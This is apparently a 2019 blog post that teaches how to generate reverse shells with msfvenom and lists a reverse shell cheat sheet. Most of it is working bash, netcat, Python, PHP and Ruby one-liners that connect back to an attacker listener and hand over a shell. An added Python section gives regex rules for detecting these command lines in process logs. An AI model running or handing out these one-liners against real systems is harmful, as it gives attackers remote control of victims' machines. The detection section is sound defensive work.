This post records how to use Msfvenom to generate various one-liner reverse shells, and also serves as a Reverse Shell Cheat Sheet.

0x01 Msfvenom

List all reverse shell payloads:

  • msfvenom --list payload | grep cmd

Bash

Generate a one-liner reverse shell:

  • msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.102 lport=4444

Reverse shell:

  • 0<&214-;exec 214<>/dev/tcp/192.168.1.102/4444;sh <&214 >&214 2>&214

Netcat shell

Generate a one-liner reverse shell:

  • msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=4444

Reverse shell:

  • mkfifo /tmp/npkto; nc 192.168.1.102 4444 0</tmp/npkto | /bin/sh >/tmp/npkto 2>&1; rm /tmp/npkto

Perl

  • msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.102 lport=4444

Python

  • msfvenom -p cmd/unix/reverse_python lhost=192.168.1.102 lport=4444

Powershell

  • msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.102 lport=4444

Ruby

  • msfvenom -p cmd/windows/reverse_ruby lhost=192.168.1.102 lport=4444

PHP

  • msfvenom -p cmd/unix/reverse_php_ssl lhost=192.168.1.102 lport=4444

References

https://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload/

0x02 Reverse Shell Cheat Sheet

Bash

  • bash -i >& /dev/tcp/192.168.0.5/4444 0>&1

Netcat

  • nc -e /bin/sh 192.168.0.5 4444

Python

  • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

  • php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

  • ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

References:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
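
A defender's view of the one-liners above, as an added example that is not part of the original post: a Python matcher that flags these command-line shapes in process-execution logs. The rule names, the sample lines and the 192.0.2.10 address are constructed for this illustration.

```python
import re

# Command-line signatures for the one-liner families listed on this page.
# Rule names are labels chosen for this example, not from any product.
RULES = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/[^/\s]+/\d+"),
    "fifo_netcat": re.compile(r"\bmkfifo\b.*\bnc(?:at)?\b.*\|\s*/bin/(?:ba)?sh\b"),
    "netcat_exec": re.compile(r"\bnc(?:at)?\b.*\s-\w*e\s+/bin/(?:ba)?sh\b"),
    "python_socket_dup2": re.compile(r"\bpython[\d.]*\s+-c\b.*\bsocket\b.*\bdup2\b"),
    "php_fsockopen_exec": re.compile(
        r"\bphp\s+-r\b.*\bfsockopen\b.*\b(?:exec|system|passthru|shell_exec)\s*\("),
    "ruby_tcpsocket_exec": re.compile(r"\bruby\b.*-e.*\bTCPSocket\b.*\bexec\b"),
}

# Constructed process command lines (one per line), as an EDR or auditd
# execve feed might record them. 192.0.2.10 is a documentation address.
SAMPLE = r"""
bash -i >& /dev/tcp/192.0.2.10/4444 0>&1
0<&214-;exec 214<>/dev/tcp/192.0.2.10/4444;sh <&214 >&214 2>&214
mkfifo /tmp/f; nc 192.0.2.10 4444 0</tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f
nc -e /bin/sh 192.0.2.10 4444
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("192.0.2.10",4444));os.dup2(s.fileno(),0)'
php -r '$sock=fsockopen("192.0.2.10",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("192.0.2.10",4444).to_i;exec sprintf("/bin/sh -i <&%d",f)'
nc -zv 192.0.2.10 443
python -c 'import socket; print(socket.gethostname())'
php -r 'echo PHP_VERSION;'
""".strip().splitlines()


def classify(cmdline):
    """Return the sorted names of every rule that matches one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def scan(cmdlines):
    """Return (index, cmdline, rule_names) for each line that matches a rule."""
    hits = []
    for i, line in enumerate(cmdlines):
        names = classify(line)
        if names:
            hits.append((i, line, names))
    return hits


if __name__ == "__main__":
    for i, line, names in scan(SAMPLE):
        print(f"line {i}: {','.join(names)} :: {line}")
```

These signatures cover only the literal forms listed on this page; pair them with egress-connection telemetry for shell processes whose standard streams are sockets.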

0x03 Appendix: Kali WebShell

  • /usr/share/webshells/

Last updated: 2019-05-28 23:32

Original link: https://sakuxa.com/2019/05/28/msf系列之msfvenom02/